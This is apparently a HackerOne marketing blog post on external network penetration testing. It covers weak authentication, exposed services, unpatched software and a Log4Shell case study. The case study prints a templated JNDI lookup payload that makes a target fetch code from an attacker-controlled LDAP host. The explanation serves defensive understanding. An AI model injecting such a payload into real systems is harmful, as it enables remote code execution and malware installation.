HackerOne Blog

External Network Penetration Testing and Best Practices

Paul De Baldo V
Senior Technical Engagement Manager
Digital Hallway

The risk of a cyberattack against your organization is constant. Thousands of threat actors, including those backed by nation-states and belonging to ransomware gangs, are incessantly searching for vulnerabilities in public-facing assets.

 

Assets such as web applications, email servers, remote access services, firewalls, VPNs, and APIs are directly accessible from the Internet, making them easy targets for this persistent barrage of malicious network traffic.

 

The resiliency of your organization’s perimeter defenses is the determining factor in preventing unauthorized access to sensitive data and systems. If this perimeter is breached, cybercriminals can establish persistent access to the system and remain undetected indefinitely.

 

An external network penetration test provides a security assessment that simulates the real-world remote threats that your organization is exposed to. In contrast to an internal network penetration test, little to no information or initial access into the target system is granted. External network pentests are conducted using a black box methodology. This testing methodology ensures the attack surface of your organization is hardened by identifying vulnerabilities so they can be addressed before they are taken advantage of by others with malicious intent.

 

HackerOne offers a methodology-driven penetration testing (pentesting) solution delivered via a Pentest as a Service (PTaaS) model. This approach connects organizations with a heavily vetted cohort of a global ethical hacker community for comprehensive, end-to-end pentesting.

Testing Methodologies

HackerOne's testing methodologies are grounded in the principles of the PTES, OSSTMMNIST SP 800-115, and CREST and can be tailored to various assessment types including external systems. Our methodology is continuously evolving to ensure comprehensive coverage for each pentesting engagement. This approach stems from:

  • Consultations with both internal and external industry experts.
  • Leveraging and adhering to recognized industry standards.
  • Gleaning insights from a vast array of global customer programs, spanning both time-bound and ongoing engagements.
  • Detailed analysis of millions of vulnerability reports we receive through our platform.

Threats are constantly evolving, so our methodology can't remain stagnant. HackerOne’s Delivery team, including experienced Technical Engagement Managers (TEMs), constantly refine and adapt based on feedback and real-world experiences, delivering unparalleled security assurance.

Common External Vulnerabilities

Weak Authentication Mechanisms

The absence of defensive measures such as Multi-Factor Authentication (MFA), rate limiting, and credential complexity requirements provide threat actors with reliable attack vectors for compromising a system.

Exploitation techniques such as dictionary and brute force attacks can be used to issue a massive amount of authentication requests with the objective of guessing valid credentials. These attacks can be carried out using lists of commonly used passwords or custom scripts to increase the likelihood of success.

Even if the aforementioned security mechanisms are in place, they can be improperly implemented leading to vulnerabilities in their processing logic. Time-based authentication tokens or the reuse of tokens from a rotating pool can result in MFA bypasses. Insufficient client fingerprinting techniques can render rate limiting protections useless. Flawed validation or sanitization checks that do not account for encoded characters or concatenated values can lead to credential requirements being circumvented.

Failures can also occur in cryptography, allowing threat actors to create counterfeit session tokens.

Certain vendor services and software may even use a set of default credentials that are only intended to be used for the initial configuration process. These default credentials are usually tied to administrative accounts with elevated permissions. Official documentation or user manuals are publicly available online, meaning if these credentials are not changed they can be easily discovered and used by attackers to gain system access.

Open Ports and Exposed Services

Each unnecessary network port and service exposed to the Internet increases the attack surface of your organization. Modern scanning tools are capable of scanning tens of thousands of ports in a matter of minutes, allowing threat actors to quickly enumerate the services unprotected by firewall security rules and accepting remote connections. Attackers and security companies alike are constantly scanning every IP address on the internet for open ports and vulnerable services.

 

Internet-facing data storage services such as MySQL and shared file access services like FTP, can result in sensitive data theft. While, unauthorized access to services that provide direct system access such as Telnet, Secure Shell (SSH), and Remote Desktop Protocol (RDP) can lead to full machine compromise. In particular, if the service is misconfigured or vulnerable to a publicly available exploit.

 

Additionally, asset management is one of the most critical and challenging parts of a cybersecurity program. Shadow IT, including cloud resources and internet connected systems, need to be identified before they can be protected. Often Shadow IT systems are set up by employees who do not understand basic cybersecurity practices or how to properly protect these systems from attackers.  Attackers may be able to compromise Shadow IT assets to gain access to sensitive data or the internal network.Shadow IT resources are prime targets as many lack basic security measures, leaving them vulnerable to attack.

Unpatched Hardware and Software

When security vulnerabilities are identified in software and devices, vendors or maintainers will issue updated versions or patches to resolve these issues. Failing to update to the latest release can leave operating systems, extensions, dependencies, applications, or devices like routers vulnerable to publicly known threats. This is especially dangerous as these vulnerabilities often have proof-of-concept exploits available online.

If an asset or component unintentionally discloses its exact versioning through a verbose error message or exposed information page, attacks can be carried out using simple search engine or database queries to discover potential weaknesses. As mentioned above, attackers are constantly scanning every IP address on the internet for outdated and vulnerable services.

 

Even the third-party code packages, libraries, and modules that your software relies on could contain security vulnerabilities. These dependencies can rely on dependencies themselves, creating a complex chain of modular code with each link potentially introducing vulnerabilities. Dependencies can also be purposefully sabotaged with malware through dependency confusion and package hijacking attacks. The contagious reach of these supply chain security issues can be massive, potentially affecting millions depending on the popularity of the dependency.

External Network Testing Best Practices

Careful Scoping

Defining a scope that aligns with the business objectives and concerns of your organization is essential to a successful pentest. To ensure a comprehensive assessment, it's recommended to set a broad scope that allows pentesters to navigate across your entire asset inventory, just as real threat actors will.

 

However, with limited resources and time, engagements can be tailored to target the most critical areas. HackerOne evaluates your assets to accurately determine the optimal pentest conditions and provides a customized quote tailored to your specific pentest requirements.

 

Download the Pre-Pentest Checklist to address crucial questions before your next pentest.

Skills-Based Tester Matching

While traditional consultancies may also advertise external network testing services, they usually source their own in-house researchers with limited expertise. However, in order to accurately test your systems against realistic attack scenarios, you need to match the diversity of skills exhibited by the thousands of threat actors and cybercriminals across the globe.

HackerOne Pentest, delivered through a Pentest as a Service (PTaaS) model, provides access to a global community of elite, vetted security researchers with specialized skills. By tracking each researcher's skill set and certifications, HackerOne ensures the most suitable specialists are matched for each engagement. This tailored approach results in the discovery of high and critical severity findings that often elude more general approaches, delivering the detailed attention required.

With HackerOne's community-driven PTaaS model, customers receive versatile, high-quality results, uniquely aligned with the specific assets and technology stacks present in their external networks.

Case Study: Log4Shell

In 2021, a security vulnerability was discovered in Apache’s Log4J 2 framework. The vulnerability, named Log4Shell (CVE-2021-44228), allows for remote code execution (RCE) on any host using Log4J versions up to and including 2.14.1.

 

Available as open-source software, Log4J is an extremely popular library that records system or application activity. Creating this ledger of activity is referred to as “logging” and is vital to understanding how the system is performing. Rather than write code to facilitate logging from scratch, developers can use the pre-written code of Log4J in their Java products instead.

 

The vulnerable versions include unrestricted user input in the logs. This can be abused by sending payloads that are interpreted and executed as an API call by the Java Naming and Directory Interface (JNDI). Due to this, RCE is achieved by injecting a JNDI lookup call to download malware from an attacker-controlled server, which is then automatically executed by the target.

 

The ease of which this attack is carried out contributed to its critical severity rating. For instance, the following payload could simply be added to an HTTP request or chat message, instructing the target to download malware using the Lightweight Directory Access Protocol (LDAP):

 

${jndi:ldap://<host>:<port>/<path>}

 

Once this vulnerability became public knowledge, scans to detect it and exploitation attempts surged. Log4Shell was exploited to install cryptocurrency miners and infect hosts with ransomware. Due to the ubiquitous use of Log4J, across millions of systems worldwide, the Log4Shell vulnerability is still an issue today and will continue to be for years to come.

Why HackerOne Is The Best Option For External Network Pentests

By choosing HackerOne as your partner in pentesting, your organization can fully benefit from the community-driven PTaaS model. The HackerOne Platform simplifies pentest requests, asset onboarding, and researcher enlistment, making the process swift and efficient.

Our community of security researchers bring the expertise needed to thoroughly audit your external networks for vulnerabilities. You will extend your attack surface coverage and be able to address vulnerabilities arising from a variety of technology stacks. With rapid setup, continuous monitoring, and prompt retesting of fixes, HackerOne safeguards your external network assets in an ever-changing threat landscape.

Offensive Security
Pentest as a Service